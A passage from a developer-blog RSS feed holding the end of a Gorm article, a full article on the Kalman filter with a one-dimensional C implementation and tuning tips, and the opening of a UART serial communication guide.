&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Update all fields on conflict
db.Clauses(clause.OnConflict{UpdateAll: true}).CreateInBatches(&amp;amp;users, 50)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Gorm’s core is “encapsulating SQL logic into Go methods”. Understanding core objects like &lt;code&gt;DB&lt;/code&gt; and &lt;code&gt;Statement&lt;/code&gt; allows you to master its execution workflow. Practical techniques (e.g., &lt;code&gt;embed&lt;/code&gt;, &lt;code&gt;Pluck&lt;/code&gt;, &lt;code&gt;DryRun&lt;/code&gt;) and pitfall avoidance (time zone discrepancies, zero-value updates) require practice in real-world scenarios.&lt;/p&gt;

</description>
      <category>go</category>
      <category>sql</category>
    </item>
    <item>
      <title>Kalman Filter Algorithm: Core Principles, Advantages, Applications, and C Code Implementation</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Sat, 01 Nov 2025 07:42:23 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/kalman-filter-algorithm-core-principles-advantages-applications-and-c-code-implementation-55mf</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/kalman-filter-algorithm-core-principles-advantages-applications-and-c-code-implementation-55mf</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;This article provides a comprehensive breakdown of the Kalman Filter algorithm, covering everything from its core concepts to practical applications, and serves as a complete reference for both engineering development and theoretical learning. It first clarifies the recursive nature of the Kalman Filter—centered on the “fusion of prediction and observation”—then analyzes its key advantages in detail, such as efficient real-time processing, optimal estimation under Gaussian assumptions, and multi-source information fusion. At the same time, it highlights limitations including dependence on linearity and Gaussianity, sensitivity to model parameters, and increased computational complexity in high-dimensional spaces. This helps readers accurately assess the scenarios where the algorithm is best suited.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/kalman-filter-algorithm-core-principles-advantages-applications-and-c-code-implementation.html" rel="noopener noreferrer"&gt;Dev Resource Hub&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Kalman Filter algorithm revolves around a core concept: fusing predictive estimates with real-world observations. Using a recursive framework, it computes optimal state estimates even when dealing with system uncertainty.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Advantages and Limitations of the Kalman Filter
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Advantages
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Efficient Recursion&lt;/strong&gt;: It operates with low computational overhead, requiring only the current-time estimate and measurement data—no need to store large volumes of historical information. This makes it ideal for real-time processing tasks.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Optimal Estimation&lt;/strong&gt;: When the system is linear and noise follows a Gaussian distribution, the Kalman Filter delivers statistically optimal results, specifically minimum variance estimates.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Robust Noise Handling&lt;/strong&gt;: It effectively mitigates random noise in both system dynamics (e.g., unmodeled disturbances) and sensor measurements (e.g., sensor drift).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Native Multi-Sensor Fusion&lt;/strong&gt;: It is inherently designed for integrating data from multiple sensors, leveraging the strengths of each (e.g., high precision from one, high update rate from another) to produce more reliable estimates.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Limitations
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Linear and Gaussian Assumptions&lt;/strong&gt;: The standard Kalman Filter relies on two key assumptions: the system’s dynamic and observation models must be linear, and both process noise (system uncertainty) and observation noise (sensor uncertainty) must be Gaussian white noise. In practice, many real-world systems exhibit non-linear behavior, which violates this constraint.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Model Sensitivity&lt;/strong&gt;: Filter performance is heavily dependent on the accuracy of the system model (defined by matrices F and H) and noise statistics (covariance matrices Q and R). Poorly tuned parameters can lead to biased estimates or even filter divergence (where estimates grow increasingly inaccurate over time).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Dimensionality Scaling Issues&lt;/strong&gt;: For high-dimensional state spaces, the computational cost of matrix operations (e.g., multiplication, inversion) increases significantly, potentially limiting its use in resource-constrained systems.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  2. Application Areas of the Kalman Filter
&lt;/h2&gt;

&lt;p&gt;Thanks to its low computational footprint, the Kalman Filter is widely adopted in scenarios where real-time performance is critical.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Application Field&lt;/th&gt;
&lt;th&gt;Specific Use Cases&lt;/th&gt;
&lt;th&gt;Role of the Kalman Filter&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Target Tracking&lt;/td&gt;
&lt;td&gt;Radar-based tracking, video surveillance, vehicle/pedestrian tracking in autonomous driving&lt;/td&gt;
&lt;td&gt;Predicts the target’s next position, fuses multi-sensor data (e.g., radar and camera feeds), smooths erratic trajectories, and refines estimates of position, velocity, and acceleration.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Motor Control &amp;amp; Filtering&lt;/td&gt;
&lt;td&gt;Servo motor feedback control, robotic joint actuation, UAV rotor speed regulation (e.g., STM32-based motor speed sensing)&lt;/td&gt;
&lt;td&gt;Filters noise from encoder feedback signals to improve motor speed and position estimates; integrates data from current sensors to enable precise state monitoring and closed-loop control.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Navigation &amp;amp; Positioning&lt;/td&gt;
&lt;td&gt;UAV navigation, autonomous vehicle localization, mobile robot guidance, smartphone GPS/IMU fusion&lt;/td&gt;
&lt;td&gt;Serves as the backbone for multi-sensor fusion. For example, it combines GPS data (which provides absolute position but has slow update rates and noise) with IMU (Inertial Measurement Unit) data (high update rates but suffers from error accumulation over time) to deliver continuous, high-precision position, velocity, and attitude estimates.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Signal Processing &amp;amp; Economic Forecasting&lt;/td&gt;
&lt;td&gt;Removing noise from time-series signals (e.g., sensor readings), stock price forecasting, macroeconomic indicator analysis&lt;/td&gt;
&lt;td&gt;Extracts underlying trends from noisy time-series data; uses historical patterns to generate short-term predictions for financial or economic variables.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aerospace&lt;/td&gt;
&lt;td&gt;Satellite orbit determination, missile guidance systems, aircraft attitude control&lt;/td&gt;
&lt;td&gt;Computes precise estimates of aircraft/satellite position, velocity, and orientation—critical for maintaining stable navigation and control in dynamic aerospace environments.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  3. Kalman Filter Example Demonstration
&lt;/h2&gt;

&lt;p&gt;The Kalman Filter’s combination of low computational cost, clear performance benefits, and no need for historical data storage makes it well-suited for real-time signal processing. The figure below compares the raw motor speed data (blue curve) with the Kalman-filtered speed data (orange curve) from a typical motor operation test. The filtered curve clearly reduces noise while preserving the underlying speed trend.&lt;/p&gt;
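<p>A comparison of this kind can be reproduced with a short, self-contained sketch. The signal, noise pattern, and tuning values below are illustrative, not the article’s test data: filter a noisy constant “speed” and check that the filtered spread is far smaller than the raw spread.</p>

```c
/* One scalar Kalman update (A = 1, H = 1), the same recursion the
 * article's filter uses: x and p hold the running estimate and
 * covariance, q and r are the noise covariances, z is the new
 * measurement. Returns the filtered value. */
float kf_step(float *x, float *p, float q, float r, float z)
{
    float pp = *p + q;          /* Prior covariance (prediction)   */
    float kg = pp / (pp + r);   /* Kalman gain                     */
    *x += kg * (z - *x);        /* Posterior estimate (update)     */
    *p = (1.0f - kg) * pp;      /* Posterior covariance            */
    return *x;
}
```

<p>Feeding it a constant speed of 100 with an alternating ±5 disturbance (Q = 0.01, R = 4) leaves the filtered output oscillating within a fraction of a unit, versus a spread of 10 in the raw samples.</p>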

&lt;h2&gt;
  
  
  4. Kalman Filter Principles: 5 Core Equations
&lt;/h2&gt;

&lt;p&gt;The Kalman Filter operates in two repeating phases—prediction and update—governed by five key equations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  State Prediction Equation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fck91ikrjo7vk2wrnt864.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fck91ikrjo7vk2wrnt864.png" width="408" height="31"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Error Covariance Prediction Equation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa7e7lu7uyfu1dmhw135b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa7e7lu7uyfu1dmhw135b.png" width="390" height="32"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Kalman Gain Calculation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F68tdzhf829gv6txt72sr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F68tdzhf829gv6txt72sr.png" width="257" height="57"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  State Update Equation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtf365pyp0x257hnax5c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtf365pyp0x257hnax5c.png" width="458" height="38"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Error Covariance Update Equation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdqvnaqwjli5a3d5ljisz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdqvnaqwjli5a3d5ljisz.png" width="301" height="28"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Below is a complete C language implementation based on these equations:&lt;/p&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;float Kalman_Filter(Kalman* p, float dat)
{if (!p) return 0; // Guard clause: return 0 if the Kalman structure pointer is null

    // Prediction phase: Estimate current state based on previous state
    p-&amp;gt;X = p-&amp;gt;A * p-&amp;gt;X_last;                  // Predict current state (prior estimate)
    p-&amp;gt;P = p-&amp;gt;A * p-&amp;gt;P_last + p-&amp;gt;Q;            // Predict error covariance of the prior estimate

    // Update phase: Correct prior estimate with new measurement data
    p-&amp;gt;kg = p-&amp;gt;P / (p-&amp;gt;P + p-&amp;gt;R);              // Calculate Kalman gain (weighting factor)
    p-&amp;gt;X_now = p-&amp;gt;X + p-&amp;gt;kg * (dat - p-&amp;gt;X);    // Update state to get posterior estimate
    p-&amp;gt;P_now = (1 - p-&amp;gt;kg) * p-&amp;gt;P;             // Update error covariance of the posterior estimate

    // Prepare for next iteration: Pass current posterior estimates to next time step
    p-&amp;gt;P_last = p-&amp;gt;P_now;
    p-&amp;gt;X_last = p-&amp;gt;X_now;

    return p-&amp;gt;X_now; // Return the final filtered state estimate
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Explanation of Variables in the &lt;code&gt;Kalman&lt;/code&gt; Structure
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;A&lt;/strong&gt;: State transition matrix (or scalar coefficient in 1D cases) that defines how the system state evolves over time.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Q&lt;/strong&gt;: Process noise covariance matrix (or scalar) that quantifies uncertainty in the system model (e.g., unmodeled friction in a motor).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;R&lt;/strong&gt;: Observation noise covariance matrix (or scalar) that quantifies uncertainty in sensor measurements (e.g., noise in an encoder reading).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;X_last&lt;/strong&gt;: Posterior state estimate from the previous time step (denoted as k-1|k-1), representing the optimal estimate after incorporating the last measurement.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;P_last&lt;/strong&gt;: Error covariance matrix from the previous time step (k-1|k-1), quantifying uncertainty in &lt;code&gt;X_last&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;X&lt;/strong&gt;: Prior state prediction for the current time step (k|k-1), estimated using only the system model (no measurement data yet).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;P&lt;/strong&gt;: Error covariance of the prior prediction (k|k-1), quantifying uncertainty in &lt;code&gt;X&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;kg&lt;/strong&gt;: Kalman gain (scalar in 1D cases) that balances the trust between the prior prediction (&lt;code&gt;X&lt;/code&gt;) and the new measurement (&lt;code&gt;dat&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;X_now&lt;/strong&gt;: Posterior state estimate for the current time step (k|k), the final filtered output after incorporating the new measurement.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;P_now&lt;/strong&gt;: Error covariance of the posterior estimate (k|k), quantifying uncertainty in &lt;code&gt;X_now&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
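<p>The &lt;code&gt;Kalman&lt;/code&gt; structure itself is not shown in the article; a minimal 1D definition consistent with the variable list above might look like this. The initializer name and starting values are illustrative assumptions, and the update step is repeated so the sketch compiles on its own.</p>

```c
/* Minimal 1D state for the filter; field names follow the list above. */
typedef struct {
    float A;       /* State transition coefficient        */
    float Q;       /* Process noise covariance            */
    float R;       /* Observation noise covariance        */
    float X_last;  /* Previous posterior state estimate   */
    float P_last;  /* Previous posterior error covariance */
    float X;       /* Prior state prediction              */
    float P;       /* Prior error covariance              */
    float kg;      /* Kalman gain                         */
    float X_now;   /* Current posterior state estimate    */
    float P_now;   /* Current posterior error covariance  */
} Kalman;

/* Hypothetical initializer (not from the article). */
void Kalman_Init(Kalman* p, float A, float Q, float R, float x0, float p0)
{
    p->A = A; p->Q = Q; p->R = R;
    p->X_last = x0;  /* Initial state guess */
    p->P_last = p0;  /* Initial uncertainty: nonzero so the filter can adapt */
    p->X = p->P = p->kg = p->X_now = p->P_now = 0.0f;
}

/* Same update step as the article's Kalman_Filter, repeated here so
 * this sketch is self-contained. */
float Kalman_Filter(Kalman* p, float dat)
{
    if (!p) return 0;
    p->X = p->A * p->X_last;
    p->P = p->A * p->P_last + p->Q;
    p->kg = p->P / (p->P + p->R);
    p->X_now = p->X + p->kg * (dat - p->X);
    p->P_now = (1 - p->kg) * p->P;
    p->P_last = p->P_now;
    p->X_last = p->X_now;
    return p->X_now;
}
```

<p>With A = 1, Q = 0.01, R = 0.5, and an initial state of 0, feeding a constant measurement of 10.0 for fifty iterations drives the estimate to just under 10, which makes for a quick sanity check of any port of this code.</p>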

&lt;h2&gt;
  
  
  5. Step-by-Step Interpretation: Kalman Filter Logic vs. C Code
&lt;/h2&gt;

&lt;h3&gt;
  
  
  (1) Prediction Phase
&lt;/h3&gt;

&lt;p&gt;The prediction phase uses the system model to estimate the current state and its uncertainty, without any measurement data.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;p-&amp;gt;X = p-&amp;gt;A * p-&amp;gt;X_last;&lt;/code&gt;: This line computes the &lt;strong&gt;prior state prediction&lt;/strong&gt;. It extrapolates the previous optimal estimate (&lt;code&gt;X_last&lt;/code&gt;) forward in time using the state transition model (&lt;code&gt;A&lt;/code&gt;). For example, if &lt;code&gt;A = 1&lt;/code&gt; (a stationary system like a constant motor speed), this simplifies to &lt;code&gt;X = X_last&lt;/code&gt;—the predicted speed equals the previous optimal speed. Note: This code omits the control input term (BU(k)) for simplicity (common in 1D systems with no external control).&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;p-&amp;gt;P = p-&amp;gt;A * p-&amp;gt;P_last + p-&amp;gt;Q;&lt;/code&gt;: This line computes the &lt;strong&gt;prior error covariance&lt;/strong&gt;. The term &lt;code&gt;A * P_last&lt;/code&gt; propagates the uncertainty from the previous step forward in time. The process noise &lt;code&gt;Q&lt;/code&gt; is added to account for new uncertainty introduced by the system model (e.g., sudden changes in load on a motor). In 1D cases, the transpose of &lt;code&gt;A&lt;/code&gt; (Aᵀ) equals &lt;code&gt;A&lt;/code&gt; (a scalar), so the full matrix equation (A * P_last * Aᵀ + Q) reduces to A² * P_last + Q; the code’s &lt;code&gt;A * P_last + Q&lt;/code&gt; matches this in the common stationary case A = 1.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  (2) Update Phase
&lt;/h3&gt;

&lt;p&gt;The update phase incorporates the new measurement to correct the prior prediction, producing a more accurate posterior estimate.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;p-&amp;gt;kg = p-&amp;gt;P / (p-&amp;gt;P + p-&amp;gt;R);&lt;/code&gt;: This line calculates the &lt;strong&gt;Kalman gain&lt;/strong&gt;, the filter’s “trust balance” between prediction and measurement:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  If &lt;code&gt;R&lt;/code&gt; is large (unreliable sensor), the denominator grows, making &lt;code&gt;kg&lt;/code&gt; small. The filter trusts the prior prediction (&lt;code&gt;X&lt;/code&gt;) more.&lt;/li&gt;
&lt;li&gt;  If &lt;code&gt;P&lt;/code&gt; is large (unreliable model), the numerator grows, making &lt;code&gt;kg&lt;/code&gt; close to 1. The filter trusts the new measurement (&lt;code&gt;dat&lt;/code&gt;) more. In 1D systems, the observation matrix &lt;code&gt;H&lt;/code&gt; (which maps states to measurements) is typically 1, so the full gain equation (P * Hᵀ * (H * P * Hᵀ + R)⁻¹) simplifies to the scalar division here.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;code&gt;p-&amp;gt;X_now = p-&amp;gt;X + p-&amp;gt;kg * (dat - p-&amp;gt;X);&lt;/code&gt;: This line computes the &lt;strong&gt;posterior state estimate&lt;/strong&gt;—the core of the Kalman Filter. The term &lt;code&gt;(dat - p-&amp;gt;X)&lt;/code&gt; is the &lt;strong&gt;measurement residual&lt;/strong&gt; (or “innovation”), representing the difference between what the sensor measured (&lt;code&gt;dat&lt;/code&gt;) and what the model predicted (&lt;code&gt;X&lt;/code&gt;). The Kalman gain &lt;code&gt;kg&lt;/code&gt; weights this residual: a large &lt;code&gt;kg&lt;/code&gt; means the residual has a big impact on the final estimate (trust the measurement), while a small &lt;code&gt;kg&lt;/code&gt; means the residual has little impact (trust the prediction).&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;code&gt;p-&amp;gt;P_now = (1 - p-&amp;gt;kg) * p-&amp;gt;P;&lt;/code&gt;: This line updates the &lt;strong&gt;error covariance&lt;/strong&gt; to reflect the reduced uncertainty after incorporating the measurement. Since we now have more information (the new measurement), &lt;code&gt;P_now&lt;/code&gt; will always be smaller than &lt;code&gt;P&lt;/code&gt;—the term &lt;code&gt;(1 - p-&amp;gt;kg)&lt;/code&gt; ensures this reduction. In 1D cases, the identity matrix &lt;code&gt;I&lt;/code&gt; (used in the full matrix equation: (I - kg*H)*P) is 1, so the code simplifies to the scalar form above.&lt;/p&gt;&lt;/li&gt;

&lt;/ul&gt;

&lt;h3&gt;
  
  
  (3) Preparing for the Next Iteration
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;p-&amp;gt;P_last = p-&amp;gt;P_now;&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;p-&amp;gt;X_last = p-&amp;gt;X_now;&lt;/code&gt;: These lines “pass forward” the current posterior estimates (&lt;code&gt;X_now&lt;/code&gt; and &lt;code&gt;P_now&lt;/code&gt;) to become the “previous” estimates (&lt;code&gt;X_last&lt;/code&gt; and &lt;code&gt;P_last&lt;/code&gt;) for the next time step. This recursive handoff is what allows the filter to run continuously, updating estimates as new measurements arrive.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  6. Key Takeaways and Tuning Tips
&lt;/h2&gt;

&lt;p&gt;A 1D Kalman Filter uses the prediction-update cycle to recursively fuse model-based predictions with sensor measurements, delivering optimal state estimates in uncertain environments.&lt;/p&gt;

&lt;p&gt;The performance of the filter hinges on tuning two critical parameters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Process Noise Covariance (Q)&lt;/strong&gt; : Think of &lt;code&gt;Q&lt;/code&gt; as your “trust in the system model.” If your model is imprecise (e.g., a motor with variable friction), increase &lt;code&gt;Q&lt;/code&gt;—this makes the filter rely more on sensor measurements to correct errors. If your model is highly accurate, decrease &lt;code&gt;Q&lt;/code&gt;—the filter will trust the model’s predictions more.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Observation Noise Covariance (R)&lt;/strong&gt; : Think of &lt;code&gt;R&lt;/code&gt; as your “trust in the sensor.” If the sensor is noisy (e.g., an old encoder with erratic readings), increase &lt;code&gt;R&lt;/code&gt;—the filter will downweight the measurement and trust the model more. If the sensor is precise (e.g., a high-quality laser encoder), decrease &lt;code&gt;R&lt;/code&gt;—the filter will prioritize the measurement.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tuning &lt;code&gt;Q&lt;/code&gt; and &lt;code&gt;R&lt;/code&gt; is rarely a one-time task. Typically, you’ll adjust these parameters through iterative testing: start with small values, monitor filter performance (e.g., how well the filtered curve tracks the true state), and refine until the filter balances noise reduction and responsiveness.&lt;/p&gt;
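<p>The trade-off can be seen numerically with a small sketch (the values are illustrative): iterate the covariance recursion for two different &lt;code&gt;R&lt;/code&gt; settings and compare the resulting Kalman gain; the noisier sensor ends up with the smaller gain, i.e., less influence on each estimate.</p>

```c
/* Iterate the 1D covariance recursion (A = 1) and return the Kalman
 * gain after `steps` updates; the state itself is irrelevant here. */
float gain_after(float q, float r, int steps)
{
    float p = 1.0f, kg = 0.0f;
    for (int i = 0; i < steps; i++) {
        float pp = p + q;         /* Prior covariance      */
        kg = pp / (pp + r);       /* Kalman gain           */
        p = (1.0f - kg) * pp;     /* Posterior covariance  */
    }
    return kg;
}
```

<p>With Q = 0.01, &lt;code&gt;gain_after(0.01f, 0.1f, 100)&lt;/code&gt; comes out several times larger than &lt;code&gt;gain_after(0.01f, 2.0f, 100)&lt;/code&gt;, so the filter configured for the precise sensor follows each new measurement far more aggressively.</p>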

</description>
      <category>kalmanfilter</category>
    </item>
    <item>
      <title>UART Serial Communication Guide: Principles, Parsing &amp; Visualization</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Fri, 31 Oct 2025 11:52:35 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/uart-serial-communication-guide-principles-parsing-visualization-5ack</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/uart-serial-communication-guide-principles-parsing-visualization-5ack</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;A complete guide to UART serial communication: Learn underlying principles, protocol parsing with state machines, ECharts visualization, and fix garble/loss. Ideal for embedded &amp;amp; IoT engineers.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/uart-serial-communication-guide-principles-parsing-visualization.html" rel="noopener noreferrer"&gt;UART Serial Communication Guide: Principles, Parsing &amp;amp; Visualization&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;As one of the most fundamental communication methods in embedded systems and the Internet of Things (IoT), serial communication (UART) is a core technology that every hardware/software engineer must master. It serves not only as a “window” for device debugging but also as a “link” for data exchange between sensors, microcontrollers, and industrial equipment. This article will start with the underlying principles of serial communication, explain protocol parsing logic and data processing methods in detail, and demonstrate how to efficiently implement visual analysis of serial data using practical tools—helping you truly grasp the key essentials of serial communication technology.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fputyiljx0b8drn53nrpj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fputyiljx0b8drn53nrpj.png" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  I. The Underlying Logic of Serial Communication: Why Can Data Be Transmitted with Just Three Wires?
&lt;/h2&gt;

&lt;p&gt;Many engineers use serial communication regularly, yet they may not fully understand its underlying communication logic. At its core, serial communication is &lt;strong&gt;asynchronous serial communication&lt;/strong&gt;, which enables bidirectional data transmission via two data lines (TX for transmission, RX for reception) and a GND line for reference voltage. Unlike SPI or I2C, it does not require a clock line for synchronization; instead, it relies on “pre-agreed timing” to ensure accurate data reception.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 Core Parameters of Serial Communication: The “Language Rules” Determining Data Transmission
&lt;/h3&gt;

&lt;p&gt;To establish stable serial communication, both parties must first align on “language rules”—specifically, the following 5 core parameters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Baud Rate&lt;/strong&gt;: The number of binary bits transmitted per unit time. Common values include 9600, 115200, and 38400 bps. For example, 9600 bps means 9600 bits are transmitted per second (including start bits, data bits, parity bits, and stop bits); the actual effective data rate excludes control bits.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Data Bits&lt;/strong&gt;: The number of valid data bits in each data frame, typically 8 bits (corresponding to one byte) or 7 bits (compatible with ASCII encoding).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Stop Bits&lt;/strong&gt;: A flag indicating the end of a data frame, configurable as 1, 1.5, or 2 bits. It gives the receiver time to prepare for the next frame.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Parity Bit&lt;/strong&gt;: Used to check for transmission errors. Options include odd parity (the total number of 1s in data bits + parity bit is odd), even parity (the total number of 1s is even), and no parity (the most common choice, relying on upper-layer protocols for error tolerance).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Flow Control&lt;/strong&gt;: An optional parameter to prevent data overflow (e.g., RTS/CTS hardware flow control, XON/XOFF software flow control). It is unnecessary in most simple scenarios (e.g., sensor data transmission).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Key Principle&lt;/strong&gt;: The transmitter encapsulates data into frames (start bit + data bits + parity bit + stop bit) based on the parameters. The receiver parses the frame structure using the same parameters—mismatched parameters will result in garbled data (e.g., “####” or random characters when baud rates differ).&lt;/p&gt;
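<p>One practical consequence of this framing: control bits reduce effective throughput. With the common 8N1 configuration (1 start + 8 data + 0 parity + 1 stop = 10 bits per byte), a 9600 bps link carries at most 9600 / 10 = 960 payload bytes per second. A small helper makes the arithmetic explicit:</p>

```c
/* Effective payload bytes per second on an asynchronous serial link:
 * every byte costs 1 start bit + data bits + parity bits + stop bits
 * on the wire. (A fractional 1.5-stop-bit setting would need a float
 * version; this integer sketch covers the common 1 and 2 cases.) */
unsigned effective_bytes_per_sec(unsigned baud, unsigned data_bits,
                                 unsigned parity_bits, unsigned stop_bits)
{
    unsigned bits_per_frame = 1u + data_bits + parity_bits + stop_bits;
    return baud / bits_per_frame;
}
```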

&lt;h3&gt;
  
  
  1.2 Serial Data Frame Structure: How a Frame Is “Split” and “Identified”
&lt;/h3&gt;

